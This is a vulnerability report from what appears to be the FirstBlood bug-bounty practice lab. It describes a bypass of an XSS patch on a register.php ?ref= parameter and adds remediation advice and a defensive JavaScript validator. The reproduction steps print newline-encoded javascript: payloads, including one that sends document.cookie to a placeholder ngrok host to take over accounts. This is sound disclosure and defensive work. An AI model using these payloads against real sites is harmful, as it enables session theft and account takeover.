FirstBlood-#617 — [COLLAB] DOM XSS on register patch bypass
This issue was discovered on FirstBlood v2
On 2021-10-26, amec0e Level 3 reported:
Hey mate,
Using a previous report for a DOM XSS on the endpoint register.php via the parameter ref=. Playing with this I was able to find a bypass for the current patch: using newline encodings we can achieve XSS. Due to the lack of the HttpOnly flag on the drps cookies we can leak this token for a full ATO.
Impact:
Due to the lack of HttpOnly on the drps cookie it is entirely possible, using the payload below, to steal a drps cookie when they click "Return to previous page" on the register.php endpoint with the ref parameter.
jav%0Aascr%0Aipt:window.location.href=`YOURNGROKADDRESS/${document.cookie}`
Steps to Reproduce:
(Doctor NOT logged in)
- Visit the endpoint register.php
- Append the following payload to the URL and press "Enter":
?ref=jav%0Aascr%0Aipt:confirm(document.domain);
- Now click "Return to previous page" and observe the payload triggering.
(Logged in as Doctor)
- Visit the endpoint register.php
- Start your Ngrok server.
- Append the following payload to the URL and press "Enter":
?ref=jav%0Aascr%0Aipt:window.location.href=`YOURNGROKADDRESS/${document.cookie}`
- Now click "Return to previous page" and observe the cookie has been sent to our ngrok server.
Remediation:
Set the HttpOnly flag on the doctor's cookies and disallow javascript: URI redirections.
(Please do verify these remediation steps to ensure they are accurate.)
Best regards,
Amec0e.
In Collaboration with thebinarybot
P3 Medium
Endpoint: register.php
Parameter: ?ref=
Payload: NA
FirstBlood ID: 32
Vulnerability Type: Reflective XSS
The parameter ?ref on register.php was poorly fixed and can be bypassed in various ways. Firstly, the developer failed to use strtolower() when comparing strings, and the use of characters such as %09 will also bypass the filter.
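As an added defensive example (not code from FirstBlood or the reporter), the validator below shows why a raw-string check misses the newline and tab encodings described above, and how parsing the value with the URL API before allowing the redirect closes that whole class of bypass; SITE_ORIGIN and DEFAULT_RETURN are assumed values, not taken from the application.

```javascript
// Added example, not FirstBlood's own code: a hardened validator for the
// register.php ?ref= "Return to previous page" link, beside the kind of
// raw-string check the report describes as bypassed. SITE_ORIGIN and
// DEFAULT_RETURN are assumed values, not taken from the application.
const SITE_ORIGIN = "https://firstblood.example";
const DEFAULT_RETURN = "/index.php";

// Weak check: case-sensitive match on the undecoded raw string. Only the
// lowercase literal is tested, so "JavaScript:" or an encoded newline or
// tab inside the scheme ("jav%0Aascr%0Aipt:", "jav%09ascript:") slips by.
function weakIsSafeRef(ref) {
  return !ref.startsWith("javascript:");
}

// Hardened check: decode once, then let the WHATWG URL parser normalise the
// value exactly as the browser will when it follows the link (it strips ASCII
// tab/newline and lowercases the scheme). Allow only http(s) on our origin;
// anything else falls back to a fixed in-site page.
function safeReturnUrl(rawRef) {
  if (typeof rawRef !== "string" || rawRef === "") return DEFAULT_RETURN;
  let decoded;
  try {
    decoded = decodeURIComponent(rawRef);
  } catch {
    return DEFAULT_RETURN; // malformed percent-encoding
  }
  let url;
  try {
    url = new URL(decoded, SITE_ORIGIN); // relative paths resolve to our origin
  } catch {
    return DEFAULT_RETURN;
  }
  const httpScheme = url.protocol === "http:" || url.protocol === "https:";
  if (!httpScheme || url.origin !== SITE_ORIGIN) return DEFAULT_RETURN;
  return url.pathname + url.search + url.hash;
}

// Constructed inputs: the report's bypass payload, the tab variant from the
// triage note, a mixed-case scheme, an off-site URL and a legitimate page.
const SAMPLES = [
  "jav%0Aascr%0Aipt:confirm(document.domain);",
  "jav%09ascript:confirm(document.domain);",
  "JavaScript:confirm(document.domain);",
  "https://attacker.example/",
  "/dashboard.php?page=2",
];
for (const s of SAMPLES) {
  console.log(s, "| weak passes:", weakIsSafeRef(s), "| hardened ->", safeReturnUrl(s));
}
```

The same normalisation applies server-side: a PHP patch that compared the raw string without strtolower() and without stripping control characters is what the triage note above describes, and parsing the decoded value rather than pattern-matching the scheme avoids both gaps.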